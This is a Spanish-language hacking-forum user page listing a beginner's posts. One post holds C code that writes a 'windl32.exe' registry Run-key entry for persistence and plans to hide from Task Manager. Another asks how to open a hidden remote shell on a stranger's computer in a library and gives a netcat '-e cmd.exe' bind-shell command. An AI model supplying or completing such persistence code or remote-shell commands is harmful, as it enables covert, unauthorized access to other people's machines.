elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: [1]
1  Programación / Programación C/C++ / Problema con Dev C++ en: 18 Septiembre 2012, 19:50 pm
Estoy creando un programa en Dev C++ que tienes estas funciones pero hay un problema  :-\,

- Que se agregue al registro
  
-  Mueva el raton aleatoriamente

- Ocultarse del administrador de tareas

- i otras funciones que tengo

De momento tengo el codigo de agregarse al registro:


Citar
#include <windows.h>

int main()
{
HKEY hkey;
RegOpenKeyEx
(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
RegSetValueEx(hkey,"windl32",0,REG_SZ,(const unsigned char*)"I:\windl32.exe",sizeof"I:\windl32.exe");        
RegCloseKey(hkey);
}
 

Y el de mover la rata

Citar
#include <windows.h>

int main()
{
    FreeConsole();
    srand(GetTickCount());



    int nWidth  = GetSystemMetrics(SM_CXSCREEN) - 1;
    int nHeight = GetSystemMetrics(SM_CYSCREEN) - 1;


    
        while(!GetAsyncKeyState(VK_F8)){
        SetCursorPos((rand() % nWidth) + 1, (rand() % nHeight) + 1);
        Sleep(5);


    }
    return 0;


}



Al momento de juntar estas dos funciones pues me tira un error de compilación, ya llevo varios dias buscando y no logro encontrar esta solucion....

2  Seguridad Informática / Hacking / Problema con NetCat en: 27 Septiembre 2011, 22:23 pm
Bueno bueno, me e metido otra vez con ahora el tema del Netcat con lo que he escuchao esque sirve para muchas cosas. lo instale en mi Xubuntu 11.04

Todo bien hasta que tengo una duda,
Por ejemplo: si estoy en una libreria y a el otro lado hay un "friki" a la otra parte que le se su IP como le podria abrir una Cmd? e visto como se hacia pero la duda en si esque se necesita que el friki este tenga una Shell abierta escuchando al puerto que lo he puesto? si es aci es muy facil que se  entere....
Abria añgun metodo al que conectarse directamente desde Ubuntu y abrirle una Shell al otro?
Código:
nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe
lo he probao pero no me va y como que esta todo en ingles xD no piye nada XD.

Alguien sabe algo?

Saludooos .

NetF
3  Sistemas Operativos / GNU/Linux / No puedo poner BackTrack 5 en DVD en: 1 Septiembre 2011, 14:53 pm
Hola amigoos !

Pues miren hace tiempo que vengo probando Xubuntu y Fedora desde un CD para no llenar el Disco duro, pero ahora he visto que Backtrack 5 se esta volviendo mas famoso haci que lo intente probar, me descargue Backtrack 5 Gnome en ISO y cuando quiero grabar la imagen Con NERO al final no se ha grabado NADA ! WTF !!! :¬¬ :¬¬

Probe con otros DVD pero sigue sin acabarlo de grabar. He buscado por GOOGLE y nada.

alguien de vosotros me podria ayudar con este problemilla hahahahaah :xD :xD :laugh:


Saludoos !

NetF.
4  Foros Generales / Foro Libre / Me presentoo en grande ! en: 20 Agosto 2011, 22:58 pm
Buenas a todos!!

me llamo Netflash, hace mas o menos 1 año que me adentre al tema de informatica, sobre tdo en la creacion de malware xD.

Casi siempre e seguido este foro para saver tutoriales porque aqui lo explicais muy bien ahahahha !!

Como hos he dicho aqui solo me voy a presentar ya que las preguntas se hacen en otros apartados.

 Saludos.

Netflash
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines